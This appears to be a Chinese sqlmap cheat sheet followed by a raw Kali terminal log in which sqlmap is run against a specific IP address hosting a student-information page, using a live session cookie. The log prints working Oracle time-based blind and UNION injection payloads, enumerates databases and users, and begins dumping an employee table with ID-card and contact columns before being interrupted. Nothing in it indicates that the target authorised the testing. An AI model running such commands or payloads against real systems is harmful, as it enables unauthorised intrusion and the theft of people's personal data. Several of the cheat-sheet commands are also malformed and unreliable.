sqlmap实例文档
sqlmap 手册参数整理文档
1、
--data
sqlmap -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
2、SQLmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" "
3、sqlmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" --dbs
4、 SQLmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" --dump
5、 sqlmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" --dump -all
6、sqlmap -u http://www.target.com/vuln.php" --data="id=1 --cookie=" -D+(数据库名) --dump
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs
___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:48:22
[09:48:23] [INFO] resuming back-end DBMS 'oracle'
[09:48:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[09:48:23] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[09:48:23] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:48:23] [INFO] fetching database (schema) names
[09:48:23] [INFO] the SQL query used returns 27 entries
available databases [27]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[09:48:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D SYS --users
___
__H__
___ ___[(]_____ ___ ___ {1.1.12#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:02:24
[10:02:25] [INFO] resuming back-end DBMS 'oracle'
[10:02:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:02:25] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:02:25] [INFO] fetching database users
[10:02:25] [INFO] the SQL query used returns 34 entries
[10:02:25] [INFO] retrieved: ANONYMOUS
[10:02:25] [INFO] retrieved: CTXSYS
[10:02:26] [INFO] retrieved: DBSNMP
[10:02:26] [INFO] retrieved: GS_KS
[10:02:26] [INFO] retrieved: HR
[10:02:26] [INFO] retrieved: MDSYS
[10:02:26] [INFO] retrieved: ODM
[10:02:26] [INFO] retrieved: ODM_MTR
[10:02:26] [INFO] retrieved: OE
[10:02:26] [INFO] retrieved: OLAPSYS
[10:02:26] [INFO] retrieved: ORDPLUGINS
[10:02:26] [INFO] retrieved: ORDSYS
[10:02:27] [INFO] retrieved: OUTLN
[10:02:27] [INFO] retrieved: PM
[10:02:27] [INFO] retrieved: QS
[10:02:27] [INFO] retrieved: QS_ADM
[10:02:27] [INFO] retrieved: QS_CB
[10:02:27] [INFO] retrieved: QS_CBADM
[10:02:27] [INFO] retrieved: QS_CS
[10:02:27] [INFO] retrieved: QS_ES
[10:02:27] [INFO] retrieved: QS_OS
[10:02:27] [INFO] retrieved: QS_WS
[10:02:27] [INFO] retrieved: RMAN
[10:02:28] [INFO] retrieved: SCOTT
[10:02:28] [INFO] retrieved: SH
[10:02:28] [INFO] retrieved: SYS
[10:02:28] [INFO] retrieved: SYSTEM
[10:02:28] [INFO] retrieved: TESTDB
[10:02:28] [INFO] retrieved: WKPROXY
[10:02:28] [INFO] retrieved: WKSYS
[10:02:28] [INFO] retrieved: WMSYS
[10:02:28] [INFO] retrieved: XDB
[10:02:28] [INFO] retrieved: XDGSNEW
[10:02:28] [INFO] retrieved: YJSANDRBAC
database management system users [34]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] GS_KS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_ADM
[*] QS_CB
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[10:02:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'
[*] shutting down at 10:02:28
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D SYS -T
___
__H__
___ ___[)]_____ ___ ___ {1.1.12#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
Usage: python sqlmap [options]
sqlmap: error: -T option requires an argument
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D SYS --T
___
__H__
___ ___[,]_____ ___ ___ {1.1.12#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
Usage: python sqlmap [options]
sqlmap: error: no such option: --T
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:04:03
[10:04:04] [INFO] resuming back-end DBMS 'oracle'
[10:04:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:04:04] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:04:04] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:04:04] [INFO] fetching database (schema) names
[10:04:04] [INFO] the SQL query used returns 27 entries
available databases [27]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[10:04:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'
[*] shutting down at 10:04:04
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs --users
___
__H__
___ ___[,]_____ ___ ___ {1.1.12#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:04:11
[10:04:12] [INFO] resuming back-end DBMS 'oracle'
[10:04:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:04:12] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:04:12] [INFO] fetching database users
[10:04:12] [INFO] the SQL query used returns 34 entries
database management system users [34]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] GS_KS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_ADM
[*] QS_CB
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[10:04:12] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:04:12] [INFO] fetching database (schema) names
[10:04:12] [INFO] the SQL query used returns 27 entries
available databases [27]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[10:04:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'
[*] shutting down at 10:04:12
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -tables
___
__H__
___ ___[']_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:05:02
[10:05:02] [INFO] setting file for logging HTTP traffic
[10:05:03] [INFO] resuming back-end DBMS 'oracle'
[10:05:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:05:03] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[10:05:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'
[*] shutting down at 10:05:03
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -f --banner -users
___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:06:51
[10:07:06] [CRITICAL] host 'sers' does not exist
[*] shutting down at 10:07:06
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dbs
___
__H__
___ ___[.]_____ ___ ___ {1.1.12#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:43:00
[10:43:00] [INFO] resuming back-end DBMS 'oracle'
[10:43:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:43:01] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:43:01] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:43:01] [INFO] fetching database (schema) names
[10:43:01] [INFO] the SQL query used returns 27 entries
available databases [27]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TESTDB
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XDGSNEW
[*] YJSANDRBAC
[10:43:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'
[*] shutting down at 10:43:01
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" --dump
___
__H__
___ ___[(]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:44:45
[10:44:45] [INFO] resuming back-end DBMS 'oracle'
[10:44:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[10:44:46] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:44:46] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:44:46] [INFO] fetching current database
[10:44:46] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[10:44:46] [INFO] fetching tables for database: 'XDGSNEW'
[10:44:46] [INFO] the SQL query used returns 292 entries
[10:44:46] [INFO] fetching columns for table 'BASE_EMPLOYEE160920' in database 'XDGSNEW'
[10:44:46] [INFO] the SQL query used returns 20 entries
[10:44:46] [INFO] resumed: "EMPLOYEEID","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEENO","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEENAME","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEENAME_EN","VARCHAR2"
[10:44:46] [INFO] resumed: "BORNDATE","DATE"
[10:44:46] [INFO] resumed: "GENDER","VARCHAR2"
[10:44:46] [INFO] resumed: "TECHNICTITLECODE","VARCHAR2"
[10:44:46] [INFO] resumed: "DUTY","VARCHAR2"
[10:44:46] [INFO] resumed: "CULTURELEVEL","VARCHAR2"
[10:44:46] [INFO] resumed: "DEGREE","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEETYPECODE","VARCHAR2"
[10:44:46] [INFO] resumed: "MENTORLEVEL","VARCHAR2"
[10:44:46] [INFO] resumed: "RESUME","VARCHAR2"
[10:44:46] [INFO] resumed: "EMAIL","VARCHAR2"
[10:44:46] [INFO] resumed: "EMPLOYEEPHOTO","BLOB"
[10:44:46] [INFO] resumed: "IDCARDNO","VARCHAR2"
[10:44:46] [INFO] resumed: "DEPARTMENTCODE","VARCHAR2"
[10:44:46] [INFO] resumed: "CONTACTINFO","VARCHAR2"
[10:44:46] [INFO] resumed: "STATUS","VARCHAR2"
[10:44:46] [INFO] resumed: "SECTIONOFFICE","VARCHAR2"
[10:44:46] [INFO] fetching entries for table 'BASE_EMPLOYEE160920' in database 'XDGSNEW'
[10:44:46] [INFO] the SQL query used returns 1433 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
[10:48:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:48:45] [INFO] fetching number of entries for table 'BASE_EMPLOYEE160920' in database 'XDGSNEW'
[10:48:45] [INFO] resumed: 1433
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed: ??
[10:48:45] [INFO] resumed: 08
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed: 06103010060710294427\x02A
[10:48:45] [INFO] resumed: ???
[10:48:45] [INFO] resumed:
[10:48:45] [INFO] resumed: 200309118
[10:48:45] [INFO] resumed:
[10:48:45] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
[10:50:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
^C
[10:52:03] [WARNING] Ctrl+C detected in dumping phase
Database: XDGSNEW
Table: BASE_EMPLOYEE160920
[1 entry]
+------------------------+------+-------+--------+--------+----------+------------+-------------+--------------+--------------+---------------+----------------+-----------------+------------------+
| EMPLOYEEID | DUTY | EMAIL | DEGREE | GENDER | BORNDATE | EMPLOYEENO | CONTACTINFO | CULTURELEVEL | EMPLOYEENAME | EMPLOYEEPHOTO | DEPARTMENTCODE | EMPLOYEENAME_EN | EMPLOYEETYPECODE |
+------------------------+------+-------+--------+--------+----------+------------+-------------+--------------+--------------+---------------+----------------+-----------------+------------------+
| 06103010060710294427A | NULL | NULL | ?? | NULL | 200309118 | NULL | NULL | ??? | NULL | 08 | NULL | NULL |
